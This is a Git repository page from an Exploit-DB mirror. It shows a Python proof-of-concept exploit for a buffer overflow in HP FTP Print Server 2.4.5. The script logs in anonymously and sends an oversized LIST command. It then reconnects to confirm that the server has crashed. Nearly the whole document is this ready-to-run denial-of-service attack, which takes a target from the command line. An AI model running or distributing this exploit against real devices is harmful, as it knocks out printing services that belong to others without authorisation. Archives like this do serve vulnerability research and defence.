bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/dos/2961.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

60 lines
No EOL
1.2 KiB
Python
Executable file
Raw Permalink Blame History

#!/usr/bin/python
import sys
from ftplib import FTP
print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print
if len(sys.argv) == 1:
print "Usage: %s <target>" % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
print "[+] Running attack against " + target
try:
ftp = FTP(target)
except:
print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
sys.exit(0)
try:
msg = ftp.login() # Login anonymously
print msg
except:
print "[!] Error logging anonymously.",sys.exc_info()[1]
sys.exit(0)
buf = "./A"
iMax = 9
for i in range(iMax):
buf += buf
print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "
try:
print "[+] Please, note that sometimes your connection will not be dropped. "
ftp.retrlines("LIST " + buf[0:3000])
print "[!] Exploit doesn't work :("
print
sys.exit(0)
except:
print "[+] Apparently exploit works. Verifying ... "
print sys.exc_info()[1]
ftp2 = FTP(target)
try:
msg = ftp2.login()
print "[!] No, it doesn't work :( "
print
print msg
sys.exit(0)
except:
print "[+] Yes, it works."
print sys.exc_info()[1]
# milw0rm.com [2006-12-19]
Reference in a new issue View git blame Copy permalink